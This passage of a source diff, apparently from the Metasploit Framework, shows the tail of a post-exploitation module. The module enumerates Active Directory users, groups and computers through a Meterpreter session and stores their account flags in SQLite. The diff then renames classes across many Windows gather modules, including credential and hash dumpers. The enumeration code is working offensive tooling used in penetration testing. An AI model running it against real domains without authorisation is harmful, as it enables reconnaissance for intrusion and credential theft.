+ u_sAMAccountType: group_user[2][:value].to_i,
+ u_sAMAccountName: group_user[3][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ u_displayName: group_user[4][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ u_description: group_user[5][:value].encode('UTF-16be', invalid: :replace, undef: :replace,
replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ u_logonCount: group_user[6][:value].to_i,
+ u_userAccountControl: uac_int,
+ u_userPrincipalName: group_user[8][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ u_whenChanged: group_user[9][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ u_whenCreated: group_user[10][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ u_primaryGroupID: group_user[11][:value].to_i,
+ u_badPwdCount: group_user[12][:value].to_i,
+ u_comment: group_user[13][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ u_title: group_user[14][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ u_cn: group_user[15][:value].to_s.encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ # Indicates that a given object has had its ACLs changed to a more secure value by the
+ # system because it was a member of one of the administrative groups (directly or transitively).
+ u_adminCount: group_user[16][:value].to_i,
+ u_manager: group_user[17][:value].to_s.encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ # The login script is executed
+ u_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1,
+ # The user account is disabled.
+ u_ADS_UF_ACCOUNTDISABLE: (uac_int & 0x00000002).zero? ? 0 : 1,
+ # The home directory is required.
+ u_ADS_UF_HOMEDIR_REQUIRED: (uac_int & 0x00000008).zero? ?
0 : 1,
+ # The account is currently locked out.
+ u_ADS_UF_LOCKOUT: (uac_int & 0x00000010).zero? ? 0 : 1,
+ # No password is required.
+ u_ADS_UF_PASSWD_NOTREQD: (uac_int & 0x00000020).zero? ? 0 : 1,
+ # The user cannot change the password.
+ u_ADS_UF_PASSWD_CANT_CHANGE: (uac_int & 0x00000040).zero? ? 0 : 1,
+ # The user can send an encrypted password.
+ u_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (uac_int & 0x00000080).zero? ? 0 : 1,
+ # This is an account for users whose primary account is in another domain. This account
+ # provides user access to this domain, but not to any domain that trusts this domain.
+ # Also known as a local user account.
+ u_ADS_UF_TEMP_DUPLICATE_ACCOUNT: (uac_int & 0x00000100).zero? ? 0 : 1,
+ # This is a default account type that represents a typical user.
+ u_ADS_UF_NORMAL_ACCOUNT: (uac_int & 0x00000200).zero? ? 0 : 1,
+ # This is a permit to trust account for a system domain that trusts other domains.
+ u_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (uac_int & 0x00000800).zero? ? 0 : 1,
+ # This is a computer account for a computer that is a member of this domain.
+ u_ADS_UF_WORKSTATION_TRUST_ACCOUNT: (uac_int & 0x00001000).zero? ? 0 : 1,
+ # This is a computer account for a system backup domain controller that is a member of this domain.
+ u_ADS_UF_SERVER_TRUST_ACCOUNT: (uac_int & 0x00002000).zero? ? 0 : 1,
+ # The password for this account will never expire.
+ u_ADS_UF_DONT_EXPIRE_PASSWD: (uac_int & 0x00010000).zero? ? 0 : 1,
+ # This is an MNS logon account.
+ u_ADS_UF_MNS_LOGON_ACCOUNT: (uac_int & 0x00020000).zero? ? 0 : 1,
+ # The user must log on using a smart card.
+ u_ADS_UF_SMARTCARD_REQUIRED: (uac_int & 0x00040000).zero? ? 0 : 1,
+ # The service account (user or computer account), under which a service runs, is trusted for Kerberos delegation.
+ # Any such service can impersonate a client requesting the service.
+ u_ADS_UF_TRUSTED_FOR_DELEGATION: (uac_int & 0x00080000).zero? ?
0 : 1,
+ # The security context of the user will not be delegated to a service even if the service
+ # account is set as trusted for Kerberos delegation.
+ u_ADS_UF_NOT_DELEGATED: (uac_int & 0x00100000).zero? ? 0 : 1,
+ # Restrict this principal to use only Data #Encryption Standard (DES) encryption types for keys.
+ u_ADS_UF_USE_DES_KEY_ONLY: (uac_int & 0x00200000).zero? ? 0 : 1,
+ # This account does not require Kerberos pre-authentication for logon.
+ u_ADS_UF_DONT_REQUIRE_PREAUTH: (uac_int & 0x00400000).zero? ? 0 : 1,
+ # The password has expired
+ u_ADS_UF_PASSWORD_EXPIRED: (uac_int & 0x00800000).zero? ? 0 : 1,
+ # The account is enabled for delegation. This is a security-sensitive setting; accounts with
+ # this option enabled should be strictly controlled. This setting enables a service running
+ # under the account to assume a client identity and authenticate as that user to other remote
+ # servers on the network.
+ u_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000).zero? ? 0 : 1,
+ # Now add sAMAccountType constants
+ u_SAM_DOMAIN_OBJECT: (sat_int == 0) ? 1 : 0,
+ u_SAM_GROUP_OBJECT: (sat_int == 0x10000000) ? 1 : 0,
+ u_SAM_NON_SECURITY_GROUP_OBJECT: (sat_int == 0x10000001) ? 1 : 0,
+ u_SAM_ALIAS_OBJECT: (sat_int == 0x20000000) ? 1 : 0,
+ u_SAM_NON_SECURITY_ALIAS_OBJECT: (sat_int == 0x20000001) ? 1 : 0,
+ u_SAM_NORMAL_USER_ACCOUNT: (sat_int == 0x30000000) ? 1 : 0,
+ u_SAM_MACHINE_ACCOUNT: (sat_int == 0x30000001) ? 1 : 0,
+ u_SAM_TRUST_ACCOUNT: (sat_int == 0x30000002) ? 1 : 0,
+ u_SAM_APP_BASIC_GROUP: (sat_int == 0x40000000) ? 1 : 0,
+ u_SAM_APP_QUERY_GROUP: (sat_int == 0x40000001) ? 1 : 0,
+ u_SAM_ACCOUNT_TYPE_MAX: (sat_int == 0x7fffffff) ?
1 : 0
+ }
+ run_sqlite_query(db, 'ad_users', sql_param_user)
+
+ # Now associate the user with the group
+ sql_param_mapping = { user_rid: user_rid,
+ group_rid: group_rid
+ }
+ run_sqlite_query(db, 'ad_mapping', sql_param_mapping)
+ end
+
+ rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e
+ print_error("Error(Users): #{e.message}")
+ next
+ end
+ end
+ end
+ group_gather.map(&:join)
+ end
+
+ vprint_status "Retrieving computers"
+ begin
+ computer_filter = '(objectClass=computer)'
+ computer_fields = ['distinguishedName', 'objectSid', 'cn', 'dNSHostName', 'sAMAccountType', 'sAMAccountName', 'displayName', 'logonCount', 'userAccountControl', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount', 'operatingSystem', 'operatingSystemServicePack', 'operatingSystemVersion', 'description', 'comment']
+ computers = query(computer_filter, max_search, computer_fields)
+
+ computers[:results].each do |comp|
+ computer_rid = get_rid(comp[1][:value]).to_i
+
+ uac_int = comp[8][:value].to_i # Set this because it is used so frequently below
+ sat_int = comp[4][:value].to_i
+
+ # Add the group to the database
+ # Also parse the ADF_ flags from userAccountControl: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832(v=vs.85).aspx
+ # Note that userAccountControl is basically the same for a computer as a user; this is because a computer account is derived from a user account
+ # (if you look at the objectClass for a computer account, it includes 'user') and, for efficiency, we should really store it all in one
+ # table. However, the reality is that it will get annoying for users to have to remember to use the userAccountControl flags to work out whether
+ # its a user or a computer and so, for convenience and ease of use, I have put them in completely separate tables.
+ # Also add the sAMAccount type flags from https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637(v=vs.85).aspx
+ sql_param_computer = { c_rid: computer_rid,
+ c_distinguishedName: comp[0][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ c_cn: comp[2][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ c_dNSHostName: comp[3][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ c_sAMAccountType: sat_int,
+ c_sAMAccountName: comp[5][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ c_displayName: comp[6][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ c_logonCount: comp[7][:value].to_i,
+ c_userAccountControl: uac_int,
+ c_whenChanged: comp[9][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ c_whenCreated: comp[10][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ c_primaryGroupID: comp[11][:value].to_i,
+ c_badPwdCount: comp[12][:value].to_i,
+ c_operatingSystem: comp[13][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ c_operatingSystemServicePack: comp[14][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ c_operatingSystemVersion: comp[15][:value].encode('UTF-16be', invalid: :replace, undef: :replace,
replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ c_description: comp[16][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ c_comment: comp[17][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ # The login script is executed
+ c_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1,
+ # The user account is disabled.
+ c_ADS_UF_ACCOUNTDISABLE: (uac_int & 0x00000002).zero? ? 0 : 1,
+ # The home directory is required.
+ c_ADS_UF_HOMEDIR_REQUIRED: (uac_int & 0x00000008).zero? ? 0 : 1,
+ # The account is currently locked out.
+ c_ADS_UF_LOCKOUT: (uac_int & 0x00000010).zero? ? 0 : 1,
+ # No password is required.
+ c_ADS_UF_PASSWD_NOTREQD: (uac_int & 0x00000020).zero? ? 0 : 1,
+ # The user cannot change the password.
+ c_ADS_UF_PASSWD_CANT_CHANGE: (uac_int & 0x00000040).zero? ? 0 : 1,
+ # The user can send an encrypted password.
+ c_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (uac_int & 0x00000080).zero? ? 0 : 1,
+ # This is an account for users whose primary account is in another domain. This account
+ # provides user access to this domain, but not to any domain that trusts this domain.
+ # Also known as a local user account.
+ c_ADS_UF_TEMP_DUPLICATE_ACCOUNT: (uac_int & 0x00000100).zero? ? 0 : 1,
+ # This is a default account type that represents a typical user.
+ c_ADS_UF_NORMAL_ACCOUNT: (uac_int & 0x00000200).zero? ? 0 : 1,
+ # This is a permit to trust account for a system domain that trusts other domains.
+ c_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (uac_int & 0x00000800).zero? ? 0 : 1,
+ # This is a computer account for a computer that is a member of this domain.
+ c_ADS_UF_WORKSTATION_TRUST_ACCOUNT: (uac_int & 0x00001000).zero? ? 0 : 1,
+ # This is a computer account for a system backup domain controller that is a member of this domain.
+ c_ADS_UF_SERVER_TRUST_ACCOUNT: (uac_int & 0x00002000).zero? ? 0 : 1,
+ # The password for this account will never expire.
+ c_ADS_UF_DONT_EXPIRE_PASSWD: (uac_int & 0x00010000).zero? ? 0 : 1,
+ # This is an MNS logon account.
+ c_ADS_UF_MNS_LOGON_ACCOUNT: (uac_int & 0x00020000).zero? ? 0 : 1,
+ # The user must log on using a smart card.
+ c_ADS_UF_SMARTCARD_REQUIRED: (uac_int & 0x00040000).zero? ? 0 : 1,
+ # The service account (user or computer account), under which a service runs, is trusted for Kerberos delegation.
+ # Any such service can impersonate a client requesting the service.
+ c_ADS_UF_TRUSTED_FOR_DELEGATION: (uac_int & 0x00080000).zero? ? 0 : 1,
+ # The security context of the user will not be delegated to a service even if the service
+ # account is set as trusted for Kerberos delegation.
+ c_ADS_UF_NOT_DELEGATED: (uac_int & 0x00100000).zero? ? 0 : 1,
+ # Restrict this principal to use only Data #Encryption Standard (DES) encryption types for keys.
+ c_ADS_UF_USE_DES_KEY_ONLY: (uac_int & 0x00200000).zero? ? 0 : 1,
+ # This account does not require Kerberos pre-authentication for logon.
+ c_ADS_UF_DONT_REQUIRE_PREAUTH: (uac_int & 0x00400000).zero? ? 0 : 1,
+ # The password has expired
+ c_ADS_UF_PASSWORD_EXPIRED: (uac_int & 0x00800000).zero? ? 0 : 1,
+ # The account is enabled for delegation. This is a security-sensitive setting; accounts with
+ # this option enabled should be strictly controlled. This setting enables a service running
+ # under the account to assume a client identity and authenticate as that user to other remote
+ # servers on the network.
+ c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000).zero? ? 0 : 1,
+ # Now add the sAMAccountType objects
+ c_SAM_DOMAIN_OBJECT: (sat_int == 0) ? 1 : 0,
+ c_SAM_GROUP_OBJECT: (sat_int == 0x10000000) ? 1 : 0,
+ c_SAM_NON_SECURITY_GROUP_OBJECT: (sat_int == 0x10000001) ? 1 : 0,
+ c_SAM_ALIAS_OBJECT: (sat_int == 0x20000000) ?
1 : 0, + c_SAM_NON_SECURITY_ALIAS_OBJECT: (sat_int == 0x20000001) ? 1 : 0, + c_SAM_NORMAL_USER_ACCOUNT: (sat_int == 0x30000000) ? 1 : 0, + c_SAM_MACHINE_ACCOUNT: (sat_int == 0x30000001) ? 1 : 0, + c_SAM_TRUST_ACCOUNT: (sat_int == 0x30000002) ? 1 : 0, + c_SAM_APP_BASIC_GROUP: (sat_int == 0x40000000) ? 1 : 0, + c_SAM_APP_QUERY_GROUP: (sat_int == 0x40000001) ? 1 : 0, + c_SAM_ACCOUNT_TYPE_MAX: (sat_int == 0x7fffffff) ? 1 : 0 + } + run_sqlite_query(db, 'ad_computers', sql_param_computer) + print_line "Computer [#{sql_param_computer[:c_cn]}][#{sql_param_computer[:c_dNSHostName]}][#{sql_param_computer[:c_rid]}]" if datastore['SHOW_COMPUTERS'] + end + + rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e + print_error("Error(Computers): #{e.message}") + return + end + + # Finished enumeration, now safely close the database + if db && db.close + f = ::File.size(dbfile.to_s) + print_status "Database closed: #{dbfile} at #{f} byte(s)" + end + end + + # Run the parameterised SQL query + def run_sqlite_query(db, table_name, values) + sql_param_columns = values.keys + sql_param_bind_params = values.keys.map { |k| ":#{k}" } + db.execute("replace into #{table_name} (#{sql_param_columns.join(',')}) VALUES (#{sql_param_bind_params.join(',')})", values) + end + + # Creat the SQLite Database + def create_sqlite_db + begin + obj_temp = ::Dir::Tmpname + filename = "#{obj_temp.tmpdir}/#{obj_temp.make_tmpname('ad_', 2)}.db" + db = SQLite3::Database.new(filename) + db.type_translation = true + + # Create the table for the AD Computers + db.execute('DROP TABLE IF EXISTS ad_computers') + sql_table_computers = 'CREATE TABLE ad_computers ('\ + 'c_rid INTEGER PRIMARY KEY NOT NULL,'\ + 'c_distinguishedName TEXT UNIQUE NOT NULL,'\ + 'c_cn TEXT,'\ + 'c_sAMAccountType INTEGER,'\ + 'c_sAMAccountName TEXT UNIQUE NOT NULL,'\ + 'c_dNSHostName TEXT,'\ + 'c_displayName TEXT,'\ + 'c_logonCount INTEGER,'\ + 'c_userAccountControl INTEGER,'\ + 'c_primaryGroupID INTEGER,'\ + 'c_badPwdCount 
INTEGER,'\ + 'c_description TEXT,'\ + 'c_comment TEXT,'\ + 'c_operatingSystem TEXT,'\ + 'c_operatingSystemServicePack TEXT,'\ + 'c_operatingSystemVersion TEXT,'\ + 'c_whenChanged TEXT,'\ + 'c_whenCreated TEXT,'\ + 'c_ADS_UF_SCRIPT INTEGER,'\ + 'c_ADS_UF_ACCOUNTDISABLE INTEGER,'\ + 'c_ADS_UF_HOMEDIR_REQUIRED INTEGER,'\ + 'c_ADS_UF_LOCKOUT INTEGER,'\ + 'c_ADS_UF_PASSWD_NOTREQD INTEGER,'\ + 'c_ADS_UF_PASSWD_CANT_CHANGE INTEGER,'\ + 'c_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED INTEGER,'\ + 'c_ADS_UF_TEMP_DUPLICATE_ACCOUNT INTEGER,'\ + 'c_ADS_UF_NORMAL_ACCOUNT INTEGER,'\ + 'c_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT INTEGER,'\ + 'c_ADS_UF_WORKSTATION_TRUST_ACCOUNT INTEGER,'\ + 'c_ADS_UF_SERVER_TRUST_ACCOUNT INTEGER,'\ + 'c_ADS_UF_DONT_EXPIRE_PASSWD INTEGER,'\ + 'c_ADS_UF_MNS_LOGON_ACCOUNT INTEGER,'\ + 'c_ADS_UF_SMARTCARD_REQUIRED INTEGER,'\ + 'c_ADS_UF_TRUSTED_FOR_DELEGATION INTEGER,'\ + 'c_ADS_UF_NOT_DELEGATED INTEGER,'\ + 'c_ADS_UF_USE_DES_KEY_ONLY INTEGER,'\ + 'c_ADS_UF_DONT_REQUIRE_PREAUTH INTEGER,'\ + 'c_ADS_UF_PASSWORD_EXPIRED INTEGER,'\ + 'c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION INTEGER,'\ + 'c_SAM_DOMAIN_OBJECT INTEGER,'\ + 'c_SAM_GROUP_OBJECT INTEGER,'\ + 'c_SAM_NON_SECURITY_GROUP_OBJECT INTEGER,'\ + 'c_SAM_ALIAS_OBJECT INTEGER,'\ + 'c_SAM_NON_SECURITY_ALIAS_OBJECT INTEGER,'\ + 'c_SAM_NORMAL_USER_ACCOUNT INTEGER,'\ + 'c_SAM_MACHINE_ACCOUNT INTEGER,'\ + 'c_SAM_TRUST_ACCOUNT INTEGER,'\ + 'c_SAM_APP_BASIC_GROUP INTEGER,'\ + 'c_SAM_APP_QUERY_GROUP INTEGER,'\ + 'c_SAM_ACCOUNT_TYPE_MAX INTEGER)' + db.execute(sql_table_computers) + + # Create the table for the AD Groups + db.execute('DROP TABLE IF EXISTS ad_groups') + sql_table_group = 'CREATE TABLE ad_groups ('\ + 'g_rid INTEGER PRIMARY KEY NOT NULL,'\ + 'g_distinguishedName TEXT UNIQUE NOT NULL,'\ + 'g_sAMAccountType INTEGER,'\ + 'g_sAMAccountName TEXT UNIQUE NOT NULL,'\ + 'g_groupType INTEGER,'\ + 'g_adminCount INTEGER,'\ + 'g_description TEXT,'\ + 'g_comment TEXT,'\ + 'g_cn TEXT,'\ + 'g_managedBy TEXT,'\ + 
'g_whenChanged TEXT,'\ + 'g_whenCreated TEXT,'\ + 'g_GT_GROUP_CREATED_BY_SYSTEM INTEGER,'\ + 'g_GT_GROUP_SCOPE_GLOBAL INTEGER,'\ + 'g_GT_GROUP_SCOPE_LOCAL INTEGER,'\ + 'g_GT_GROUP_SCOPE_UNIVERSAL INTEGER,'\ + 'g_GT_GROUP_SAM_APP_BASIC INTEGER,'\ + 'g_GT_GROUP_SAM_APP_QUERY INTEGER,'\ + 'g_GT_GROUP_SECURITY INTEGER,'\ + 'g_GT_GROUP_DISTRIBUTION INTEGER,'\ + 'g_SAM_DOMAIN_OBJECT INTEGER,'\ + 'g_SAM_GROUP_OBJECT INTEGER,'\ + 'g_SAM_NON_SECURITY_GROUP_OBJECT INTEGER,'\ + 'g_SAM_ALIAS_OBJECT INTEGER,'\ + 'g_SAM_NON_SECURITY_ALIAS_OBJECT INTEGER,'\ + 'g_SAM_NORMAL_USER_ACCOUNT INTEGER,'\ + 'g_SAM_MACHINE_ACCOUNT INTEGER,'\ + 'g_SAM_TRUST_ACCOUNT INTEGER,'\ + 'g_SAM_APP_BASIC_GROUP INTEGER,'\ + 'g_SAM_APP_QUERY_GROUP INTEGER,'\ + 'g_SAM_ACCOUNT_TYPE_MAX INTEGER)' + db.execute(sql_table_group) + + # Create the table for the AD Users + db.execute('DROP TABLE IF EXISTS ad_users') + sql_table_users = 'CREATE TABLE ad_users ('\ + 'u_rid INTEGER PRIMARY KEY NOT NULL,'\ + 'u_distinguishedName TEXT UNIQUE NOT NULL,'\ + 'u_description TEXT,'\ + 'u_displayName TEXT,'\ + 'u_sAMAccountType INTEGER,'\ + 'u_sAMAccountName TEXT,'\ + 'u_logonCount INTEGER,'\ + 'u_userAccountControl INTEGER,'\ + 'u_primaryGroupID INTEGER,'\ + 'u_cn TEXT,'\ + 'u_adminCount INTEGER,'\ + 'u_badPwdCount INTEGER,'\ + 'u_userPrincipalName TEXT UNIQUE,'\ + 'u_comment TEXT,'\ + 'u_title TEXT,'\ + 'u_manager TEXT,'\ + 'u_whenCreated TEXT,'\ + 'u_whenChanged TEXT,'\ + 'u_ADS_UF_SCRIPT INTEGER,'\ + 'u_ADS_UF_ACCOUNTDISABLE INTEGER,'\ + 'u_ADS_UF_HOMEDIR_REQUIRED INTEGER,'\ + 'u_ADS_UF_LOCKOUT INTEGER,'\ + 'u_ADS_UF_PASSWD_NOTREQD INTEGER,'\ + 'u_ADS_UF_PASSWD_CANT_CHANGE INTEGER,'\ + 'u_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED INTEGER,'\ + 'u_ADS_UF_TEMP_DUPLICATE_ACCOUNT INTEGER,'\ + 'u_ADS_UF_NORMAL_ACCOUNT INTEGER,'\ + 'u_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT INTEGER,'\ + 'u_ADS_UF_WORKSTATION_TRUST_ACCOUNT INTEGER,'\ + 'u_ADS_UF_SERVER_TRUST_ACCOUNT INTEGER,'\ + 'u_ADS_UF_DONT_EXPIRE_PASSWD INTEGER,'\ + 
'u_ADS_UF_MNS_LOGON_ACCOUNT INTEGER,'\ + 'u_ADS_UF_SMARTCARD_REQUIRED INTEGER,'\ + 'u_ADS_UF_TRUSTED_FOR_DELEGATION INTEGER,'\ + 'u_ADS_UF_NOT_DELEGATED INTEGER,'\ + 'u_ADS_UF_USE_DES_KEY_ONLY INTEGER,'\ + 'u_ADS_UF_DONT_REQUIRE_PREAUTH INTEGER,'\ + 'u_ADS_UF_PASSWORD_EXPIRED INTEGER,'\ + 'u_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION INTEGER,'\ + 'u_SAM_DOMAIN_OBJECT INTEGER,'\ + 'u_SAM_GROUP_OBJECT INTEGER,'\ + 'u_SAM_NON_SECURITY_GROUP_OBJECT INTEGER,'\ + 'u_SAM_ALIAS_OBJECT INTEGER,'\ + 'u_SAM_NON_SECURITY_ALIAS_OBJECT INTEGER,'\ + 'u_SAM_NORMAL_USER_ACCOUNT INTEGER,'\ + 'u_SAM_MACHINE_ACCOUNT INTEGER,'\ + 'u_SAM_TRUST_ACCOUNT INTEGER,'\ + 'u_SAM_APP_BASIC_GROUP INTEGER,'\ + 'u_SAM_APP_QUERY_GROUP INTEGER,'\ + 'u_SAM_ACCOUNT_TYPE_MAX INTEGER)' + db.execute(sql_table_users) + + # Create the table for the mapping between the two (membership) + db.execute('DROP TABLE IF EXISTS ad_mapping') + sql_table_mapping = 'CREATE TABLE ad_mapping ('\ + 'user_rid INTEGER NOT NULL,' \ + 'group_rid INTEGER NOT NULL,'\ + 'PRIMARY KEY (user_rid, group_rid),'\ + 'FOREIGN KEY(user_rid) REFERENCES ad_users(u_rid)'\ + 'FOREIGN KEY(group_rid) REFERENCES ad_groups(g_rid))' + db.execute(sql_table_mapping) + + # Create the view for the AD User/Group membership + db.execute('DROP VIEW IF EXISTS view_mapping') + sql_view_mapping = 'CREATE VIEW view_mapping AS SELECT ad_groups.*,ad_users.* FROM ad_mapping '\ + 'INNER JOIN ad_groups ON ad_groups.g_rid = ad_mapping.group_rid '\ + 'INNER JOIN ad_users ON ad_users.u_rid = ad_mapping.user_rid' + db.execute(sql_view_mapping) + + return db, filename + + rescue SQLite3::Exception => e + print_error("Error(Database): #{e.message}") + return + end + end + + def get_rid(data) + sid = data.unpack("bbbbbbbbV*")[8..-1] + sid[-1] + end +end diff --git a/modules/post/windows/gather/arp_scanner.rb b/modules/post/windows/gather/arp_scanner.rb index ba5abff56d..101967b452 100644 --- a/modules/post/windows/gather/arp_scanner.rb 
+++ b/modules/post/windows/gather/arp_scanner.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/bitcoin_jacker.rb b/modules/post/windows/gather/bitcoin_jacker.rb index adfafd3529..767fd5660c 100644 --- a/modules/post/windows/gather/bitcoin_jacker.rb +++ b/modules/post/windows/gather/bitcoin_jacker.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/bitlocker_fvek.rb b/modules/post/windows/gather/bitlocker_fvek.rb index 03406d82a0..a3841f3e74 100644 --- a/modules/post/windows/gather/bitlocker_fvek.rb +++ b/modules/post/windows/gather/bitlocker_fvek.rb @@ -1,6 +1,6 @@ require 'rex/parser/fs/bitlocker' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Error include Msf::Post::Windows::ExtAPI diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb index f5eebd432c..601de5d6c2 100644 --- a/modules/post/windows/gather/cachedump.rb +++ b/modules/post/windows/gather/cachedump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/checkvm.rb b/modules/post/windows/gather/checkvm.rb index 51de3c6061..9499d21457 100644 --- a/modules/post/windows/gather/checkvm.rb +++ b/modules/post/windows/gather/checkvm.rb 
@@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/bulletproof_ftp.rb b/modules/post/windows/gather/credentials/bulletproof_ftp.rb index 20c23ca6c3..4482b6f38a 100644 --- a/modules/post/windows/gather/credentials/bulletproof_ftp.rb +++ b/modules/post/windows/gather/credentials/bulletproof_ftp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::File diff --git a/modules/post/windows/gather/credentials/coreftp.rb b/modules/post/windows/gather/credentials/coreftp.rb index b2be541cdb..2b87c81d3c 100644 --- a/modules/post/windows/gather/credentials/coreftp.rb +++ b/modules/post/windows/gather/credentials/coreftp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/credential_collector.rb b/modules/post/windows/gather/credentials/credential_collector.rb index e58c2a2020..8563952718 100644 --- a/modules/post/windows/gather/credentials/credential_collector.rb +++ b/modules/post/windows/gather/credentials/credential_collector.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb index a90b6d3ac1..c14811d26a 100644 --- a/modules/post/windows/gather/credentials/domain_hashdump.rb 
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/auxiliary/report' require 'metasploit/framework/ntds/parser' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/dyndns.rb b/modules/post/windows/gather/credentials/dyndns.rb index f1ce358a57..7b57be4c55 100644 --- a/modules/post/windows/gather/credentials/dyndns.rb +++ b/modules/post/windows/gather/credentials/dyndns.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/enum_cred_store.rb b/modules/post/windows/gather/credentials/enum_cred_store.rb index 3a745ee044..cfa9d84987 100644 --- a/modules/post/windows/gather/credentials/enum_cred_store.rb +++ b/modules/post/windows/gather/credentials/enum_cred_store.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/gather/credentials/enum_laps.rb b/modules/post/windows/gather/credentials/enum_laps.rb index 